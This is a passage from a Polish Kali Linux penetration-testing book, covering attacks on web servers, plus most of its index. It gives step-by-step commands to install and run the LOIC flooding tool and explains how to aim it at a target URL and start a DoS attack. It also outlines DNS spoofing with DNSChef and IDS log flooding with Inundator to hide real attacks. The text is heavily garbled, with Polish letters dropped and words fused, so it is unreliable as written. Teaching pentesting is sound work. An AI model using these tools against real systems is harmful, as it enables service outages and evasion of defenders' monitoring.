LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
